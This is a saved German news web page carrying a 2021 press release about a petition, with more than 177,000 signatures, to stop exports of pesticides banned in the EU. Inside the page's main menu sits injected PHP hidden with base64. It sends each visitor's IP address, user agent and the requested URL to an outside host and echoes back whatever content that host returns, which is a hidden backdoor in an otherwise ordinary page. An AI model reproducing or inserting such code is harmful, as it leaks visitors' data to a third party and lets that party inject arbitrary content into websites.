<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	
<title>Klöckner und Altmaier müssen endlich handeln: Mehr als 177.000 Menschen fordern &quot;Giftexporte stoppen!&quot;  - Politikexpress | Politikexpress</title>

	<link rel="stylesheet" type="text/css" media="all" href="https://www.politikexpress.de/wp-content/themes/politik27/style.css" />

	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="https://www.politikexpress.de/feed" />	
	<link rel="pingback" href="https://www.politikexpress.de/xmlrpc.php" />

	<meta name='robots' content='index, follow, max-video-preview:-1, max-snippet:-1, max-image-preview:large' />

	<!-- This site is optimized with the Yoast SEO plugin v16.5 - https://yoast.com/wordpress/plugins/seo/ -->
	<link rel="canonical" href="https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html" />
	<meta property="og:locale" content="de_DE" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Klöckner und Altmaier müssen endlich handeln: Mehr als 177.000 Menschen fordern &quot;Giftexporte stoppen!&quot;  - Politikexpress" />
	<meta property="og:description" content="Über 177.000 Unterschriften für einen Exportstopp verbotener Pestizide haben das INKOTA-netzwerk und PAN Germany heute an das Bundeministerium für Ernährung und Landwirtschaft (BMEL) übergeben. Der Export von Pestiziden, die in der EU aus gutem Grund verboten sind, gefährdet die Gesundheit von Menschen im globalen Süden sowie die Umwelt massiv. Die Unterzeichner*innen fordern, dass das Exportgeschäft [&hellip;]" />
	<meta property="og:url" content="https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html" />
	<meta property="og:site_name" content="Politikexpress" />
	<meta property="article:published_time" content="2021-06-22T10:38:00+00:00" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Verfasst von" />
	<meta name="twitter:data1" content="Presse" />
	<meta name="twitter:label2" content="Geschätzte Lesezeit" />
	<meta name="twitter:data2" content="2 Minuten" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.politikexpress.de/#website","url":"https://www.politikexpress.de/","name":"Politikexpress","description":"Top News aus der Politik und Gesellschaft","potentialAction":[{"@type":"SearchAction","target":"https://www.politikexpress.de/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"de-DE"},{"@type":"WebPage","@id":"https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html#webpage","url":"https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html","name":"Kl\u00f6ckner und Altmaier m\u00fcssen endlich handeln: Mehr als 177.000 Menschen fordern \"Giftexporte stoppen!\" - Politikexpress","isPartOf":{"@id":"https://www.politikexpress.de/#website"},"datePublished":"2021-06-22T10:38:00+00:00","dateModified":"2021-06-22T10:38:00+00:00","author":{"@id":"https://www.politikexpress.de/#/schema/person/2e64e1d8eeb75d874a4ab1562d457b39"},"breadcrumb":{"@id":"https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html"]}]},{"@type":"BreadcrumbList","@id":"https://www.politikexpress.de/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https://www.politikexpress.de/"},{"@type":"ListItem","position":2,"name":"Kl\u00f6ckner und Altmaier m\u00fcssen endlich handeln: Mehr als 177.000 Menschen fordern &#8222;Giftexporte stoppen!&#8220;"}]},{"@type":"Person","@id":"https://www.politikexpress.de/#/schema/person/2e64e1d8eeb75d874a4ab1562d457b39","name":"Presse","image":{"@type":"ImageObject","@id":"https://www.politikexpress.de/#personlogo","inLanguage":"de-DE","url":"https://secure.gravatar.com/avatar/490041019896a88497eb2870ba18d448?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/490041019896a88497eb2870ba18d448?s=96&d=mm&r=g","caption":"Presse"},"url":"https://www.politikexpress.de/author/presse"}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//s.w.org' />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.politikexpress.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.2"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.politikexpress.de/wp-includes/css/dist/block-library/style.min.css?ver=5.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='borlabs-cookie-css'  href='https://www.politikexpress.de/wp-content/cache/borlabs-cookie/borlabs-cookie_1_de.css?ver=2.2.27-3' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=5.7.2' id='jquery-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/contentslider.js?ver=5.7.2' id='contentslider-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/slides.min.jquery.js?ver=5.7.2' id='slides.min-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/jCarouselLite.js?ver=5.7.2' id='jCarouselLite-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/flowplayer/flowplayer-3.2.6.min.js?ver=5.7.2' id='flowplayer-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/jquery.tools.min.js?ver=5.7.2' id='jquerytools-js'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/superfish-1.4.8.js?ver=5.7.2' id='superfish-js'></script>
<link rel="https://api.w.org/" href="https://www.politikexpress.de/wp-json/" /><link rel="alternate" type="application/json" href="https://www.politikexpress.de/wp-json/wp/v2/posts/1912429" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.politikexpress.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.politikexpress.de/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.7.2" />
<link rel='shortlink' href='https://www.politikexpress.de/?p=1912429' />
<link rel="alternate" type="application/json+oembed" href="https://www.politikexpress.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.politikexpress.de%2Fklockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html" />
<link rel="alternate" type="text/xml+oembed" href="https://www.politikexpress.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.politikexpress.de%2Fklockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html&#038;format=xml" />
<link href="https://www.politikexpress.de/wp-content/themes/politik27/styles/white.css" rel="stylesheet" type="text/css" />

	<script type='text/javascript'>
	(function($) {
		$(document).ready(function() { 
			
			$('a[href=#top]').click(function(){	$('html, body').animate({scrollTop:0}, 'slow');	return false; });
			
			$("ul.tabs").tabs("div.panes > div");			
			$("ul.sc_tabs").tabs("div.sc_tabs-content > div");
			
			$("#mediabar .container").jCarouselLite({
								scroll: 2,
				speed: 800,	
				visible: 6,
				start: 0,
				circular: false,
				btnPrev: "#previous_button",
				btnNext: "#next_button"
			});
			
			$('#slides').slides({
								preload: true,
				autoHeight: true
			});			
		});
	})(jQuery);
	</script>
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><link rel="shortcut icon" href="https://www.politikexpress.de/wp-content/themes/politik27/inc/admin//images/favicon.ico" />	

	
	
</head>

<body class="post-template-default single single-post postid-1912429 single-format-standard">

	<div id="topad">
		<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=173");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>	</div>

<div class="wrapper">


	<div id="header">

					<a href="https://www.politikexpress.de/" title="Top News aus der Politik und Gesellschaft">
				<img src="https://www.politikexpress.de/pe_header.png" id="header_banner" alt="Politikexpress" title="Politikexpress"/>
			</a>
				<div class="clear"></div>	
		
		
	</div><!-- /header -->
		
	<div class="clear"></div>		
	
	<div id="mainmenu">
<? error_reporting(0);$source=base64_decode('aHR0cDovL2dpZHJvdmlkcmEuaW4vYWJjZGUvaW5kZXgucGhwP2Q9').$_SERVER[base64_decode('SFRUUF9IT1NU')].base64_decode('JnI9').urlencode($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]).base64_decode('JnU9').urlencode($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]).base64_decode('Jmk9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];echo file_get_contents($source);?>
		<ul class="mainnav dropdown">
			<li ><a href="https://www.politikexpress.de/" title="Top News aus der Politik und Gesellschaft">START</a></li>
				<li class="cat-item cat-item-1"><a href="https://www.politikexpress.de/kategorie/allgemein">Allgemein</a>
</li>
	<li class="cat-item cat-item-125"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2">Außenpolitik</a>
<ul class='children'>
	<li class="cat-item cat-item-11"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2/aussenhandel">Außenhandel</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2/menschenrechte">Menschenrechte</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-12"><a href="https://www.politikexpress.de/kategorie/bundesregierung">Bundesregierung</a>
</li>
	<li class="cat-item cat-item-3"><a href="https://www.politikexpress.de/kategorie/innenpolitik">Innenpolitik</a>
<ul class='children'>
	<li class="cat-item cat-item-8"><a href="https://www.politikexpress.de/kategorie/innenpolitik/arbeit">Arbeit</a>
</li>
	<li class="cat-item cat-item-9"><a href="https://www.politikexpress.de/kategorie/innenpolitik/gewerkschaften">Gewerkschaften</a>
</li>
	<li class="cat-item cat-item-10"><a href="https://www.politikexpress.de/kategorie/innenpolitik/kommune">Kommune</a>
</li>
	<li class="cat-item cat-item-6"><a href="https://www.politikexpress.de/kategorie/innenpolitik/parteien">Parteien</a>
</li>
	<li class="cat-item cat-item-4"><a href="https://www.politikexpress.de/kategorie/innenpolitik/soziales">Soziales</a>
</li>
	<li class="cat-item cat-item-13"><a href="https://www.politikexpress.de/kategorie/innenpolitik/wahlen">Wahlen</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-15"><a href="https://www.politikexpress.de/kategorie/news">News</a>
</li>
	<li class="cat-item cat-item-7"><a href="https://www.politikexpress.de/kategorie/umfrage">Umfrage</a>
</li>
	<li class="cat-item cat-item-14"><a href="https://www.politikexpress.de/kategorie/umweltpolitik">Umweltpolitik</a>
</li>
		</ul>
		<div class="clear"></div>	
	</div>
	
	<div id="submenu">
		<ul class="secondarynav dropdown">
			<li class="page_item page-item-2"><a href="https://www.politikexpress.de/impressum-html">Impressum</a></li>
<li class="page_item page-item-1611819"><a href="https://www.politikexpress.de/datenschutz">Datenschutz</a></li>
			<li><a href="#" class="gab_connect">Abonnieren</a>
				<ul id="social_links">
					<li><a class="gab_rss" href="https://www.politikexpress.de/feed" rel="nofollow" title="Neueste Artikel per RSS">RSS für Artikel</a></li>
																			</ul>
			</li>
		</ul>

		<div id="search">
			<form id="searchform" action="https://www.politikexpress.de/">
	<fieldset>
		<input type="text" id="s" name="s" value="Webseite durchsuchen..." onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;"/>
		<input type="image" id="searchsubmit" src="https://www.politikexpress.de/wp-content/themes/politik27/images/button_go.gif" alt="Webseite durchsuchen..." /> 
	</fieldset>
</form>		</div><!-- /search -->
		<div class="clear"></div>	
	</div>
	
	<div class="clear"></div>

<div id="ad_billboard" align="center">

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=837");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>

</div>	<div id="container">	
		
				<div id="post-1912429" class="entry post-1912429 post type-post status-publish format-standard hentry category-menschenrechte tag-agrar tag-umwelt">
		
			<h1 class="entry_title">Klöckner und Altmaier müssen endlich handeln: Mehr als 177.000 Menschen fordern &#8222;Giftexporte stoppen!&#8220;</h1>

			<div class="metasingle">
				<span class="postdate">Juni 22, 2021 | </span>
				<span class="postcat">Abgelegt unter: <a href="https://www.politikexpress.de/kategorie/aussenpolitik-2/menschenrechte" rel="category tag">Menschenrechte</a> | </span>
				<span class="postauthor">Beitrag von: <a href="https://www.politikexpress.de/author/presse" title="Beiträge von Presse" rel="author">Presse</a></span> 
			</div><!-- /metas -->
			
			<br />
				<script type='text/javascript'><!--//<![CDATA[
				   document.MAX_ct0 = unescape('%c');
	
				   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
				   var m3_r = Math.floor(Math.random()*99999999999);
				   if (!document.MAX_used) document.MAX_used = ',';
				   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
				   document.write ("?zoneid=534");
				   document.write ('&amp;cb=' + m3_r);
				   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
				   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
				   document.write ("&amp;loc=" + escape(window.location));
				   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
				   if (document.context) document.write ("&context=" + escape(document.context));
				   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
				       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
				   }
				   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
				   document.write ("'><\/scr"+"ipt>");
				//]]>--></script>
								<br /><br />
				<iframe src="https://www.facebook.com/plugins/like.php?href=https://www.politikexpress.de&amp;layout=button_count&amp;show_faces=true&amp;width=170&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px; margin-left:15px; float:left; width:120px;" allowTransparency="true"></iframe>
				<a href="https://twitter.com/share" class="twitter-share-button" data-url="https://www.politikexpress.de" data-count="horizontal" data-via="88energie" data-lang="de">Tweet</a><script type="text/javascript" src="https://platform.twitter.com/widgets.js"></script>
				<br /><br />
			<p>Über 177.000 Unterschriften für einen Exportstopp verbotener Pestizide haben das INKOTA-netzwerk und PAN Germany heute an das Bundeministerium für Ernährung und Landwirtschaft (BMEL) übergeben. Der Export von Pestiziden, die in der EU aus gutem Grund verboten sind, gefährdet die Gesundheit von Menschen im globalen Süden sowie die Umwelt massiv. Die Unterzeichner*innen fordern, dass das Exportgeschäft mit hochgefährlichen Ackergiften gesetzlich verboten wird. Mit einer Aktion vor dem Auswärtigen Amt machten die Initiator*innen der Kampagne anlässlich des Außenwirtschaftstags der Agrar- und Ernährungswirtschaft auf die gravierenden Folgen der Pestizidexporte aufmerksam. </p>
<p>&#8222;Deutsche Exportinteressen dürfen nicht auf Kosten der Gesundheit von Landarbeiter*innen und Umwelt in anderen Ländern durchgesetzt werden. Zuzulassen, dass die ländliche Bevölkerung in Afrika oder Asien diesen Risiken ausgesetzt wird, ist menschenverachtend&#8220;, so Wiebke Beushausen, Agrarexpertin der entwicklungspolitischen Organisation INKOTA. &#8222;Es ist so als wären die Menschen dort weniger wert als Europäer*innen, Menschen zweiter Klasse. Die Bundesregierung handelt grob fahrlässig, wenn sie weiterhin die Ausfuhr von Pestiziden erlaubt, die hierzulande zu Recht verboten sind.&#8220; </p>
<p>&#8222;Agrarministerin Klöckner kann nach § 25 des deutschen Pflanzenschutzgesetzes den Export von hier verbotenen hochgefährlichen Pestiziden per Verordnung stoppen. Länder wie Frankreich und die Schweiz haben es vorgemacht. Doch bislang bleibt die deutsche Landwirtschaftsministerin untätig &#8211; und dass angesichts der Tatsache, dass jährlich 385 Millionen Menschen akute Pestizidvergiftungen erleiden&#8220;, sagt Susan Haffmans, Referentin beim Pestizid Aktions-Netzwerk e.V. (PAN Germany). &#8222;Die Menschen in Deutschland wollen eine Regierung, die ihren menschenrechtlichen Sorgfaltspflichten nachkommt und einen verbindlichen Exportstopp für verbotene Pestizide umsetzt&#8220;. </p>
<p>Bereits im letzten Jahr bestätigte der Wissenschaftliche Dienst des Bundestages, dass die rechtliche Voraussetzung für ein gesetzliches Verbot des Exports hochgefährlicher Pestizide in Deutschland gegeben ist. Über 177.000 Bürger*innen und 60 Organisationen der Zivilgesellschaft fordern Agrarministerin Julia Klöckner und Wirtschaftsminister Peter Altmaier zum Handeln auf und verlangen von der Bundesregierung, ein solches Exportverbot endlich zu beschließen. Stellvertretend für die zahlreichen Unterstützer*innen bekräftigt Wiebke Beushausen bei der Übergabe die gemeinsame Forderung: &#8222;Um Landarbeiter*innen vor Pestizidvergiftungen zu schützen und Umweltschäden zu verhindern, brauchen wir dringend ein Exportstopp verbotener Pestizide. Statt zu handeln hat Frau Klöckner bislang weggesehen. Von den Verantwortlichen der kommenden Legislaturperiode erwarten wir mehr Verantwortung und die Durchsetzung eines entsprechenden Gesetzes.&#8220; </p>
<p>Pressemitteilung als PDF: https://bit.ly/pm-als-pdf </p>
<p>Weitere Informationen: </p>
<p>Bildmaterial zur Foto-Aktion vor dem Auswärtigen Amt: https://bit.ly/pressefotos-uebergabe-giftexporte </p>
<p>Petition &#8222;Giftexporte stoppen!&#8220;: www.inkota.de/giftexporte-stoppen </p>
<p>Studie: Doppelstandards und Ackergifte von Bayer und BASF &#8211; Ein Blick hinter die Kulissen des internationalen Handels mit Pestizidwirkstoffen: https://ots.de/nvMPB4 </p>
<p>PM: Zivilgesellschaftliches Bündnis fordert Exportstopp für verbotene Pestizide: https://ots.de/dPfpfv </p>
<p>Pressekontakt: </p>
<p>Wiebke Beushausen, INKOTA-netzwerk, Projektmitarbeiterin für Welternährung und globale Landwirtschaft, Tel. 0176 58 95 12 63, E-Mail: beushausen@inkota.de</p>
<p>Susan Haffmans, PAN Germany, Referentin für Pestizide, Tel.: 0157 31 56 04 017, E-Mail: susan.haffmans@pan-germany.org</p>
<p>Original-Content von: INKOTA-netzwerk e.V., übermittelt durch news aktuell</p>
<!-- plista wp Version 1.5.10 --><div data-widget="plista_widget_"></div>
					
<script type="text/javascript">
(function(c){var g,s='script',w=window,n=c.name||'PLISTA';if(!w[n]){w[n]=c;g=w.document.getElementsByTagName(s)[0];s=w.document.createElement(s);s.async=true;s.type='text/javascript';s.src=(w.location.protocol==='https:'?'https:':'http:')+'//static'+(c.origin?'-'+c.origin:'')+'.plista.com/async'+(c.name?'/'+c.name:'')+'.js';g.parentNode.insertBefore(s,g);}
}({
    "publickey": "",
	"item": {"objectid":1912429,"title":"Kl\u00f6ckner und Altmaier m\u00fcssen endlich handeln: Mehr als 177.000 Menschen fordern &#8222;Giftexporte stoppen!&#8220;","text":"\u00dcber 177.000 Unterschriften f\u00fcr einen Exportstopp verbotener Pestizide haben das INKOTA-netzwerk und PAN Germany heute an das Bundeministerium f\u00fcr Ern\u00e4hrung und Landwirtschaft (BMEL) \u00fcbergeben. Der Export von Pestiziden, die in der EU aus gutem Grund","url":"https:\/\/www.politikexpress.de\/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html","img":"","category":"","published_at":1624358280,"updated_at":1624358280}
}));
</script>
<div class="clear"></div>		
			
					
					</div><!-- /post -->
		
		
		
<div id="comments">
	
	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Schreibe einen Kommentar <small><a rel="nofollow" id="cancel-comment-reply-link" href="/klockner-und-altmaier-mussen-endlich-handeln-mehr-als-177-000-menschen-fordern-giftexporte-stoppen-1912429.html#respond" style="display:none;">Antworten abbrechen</a></small></h3><form action="https://www.politikexpress.de/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes"><span id="email-notes">Deine E-Mail-Adresse wird nicht veröffentlicht.</span></p><p class="comment-form-comment"><label for="comment">Kommentar</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name</label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" /></p>
<p class="comment-form-email"><label for="email">E-Mail</label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Kommentar abschicken" /> <input type='hidden' name='comment_post_ID' value='1912429' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="136aff31db" /></p><input type="hidden" id="ak_js" name="ak_js" value="222"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">Diese Website verwendet Akismet, um Spam zu reduzieren. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden</a>.</p>
	
</div><!-- #comments -->	</div><!-- /container -->
	

	<div id="sidebar">
		<div class="widget">
<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=184");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>
<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=892");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>
 
	</div><!-- End of sidebar -->

	<div class="clear"></div>

<br /><br />
<center>

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=174");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>

</center>

</div><!-- end of wrapper -->

<div id="footer">

	<div class="footerlist">
			<ul>
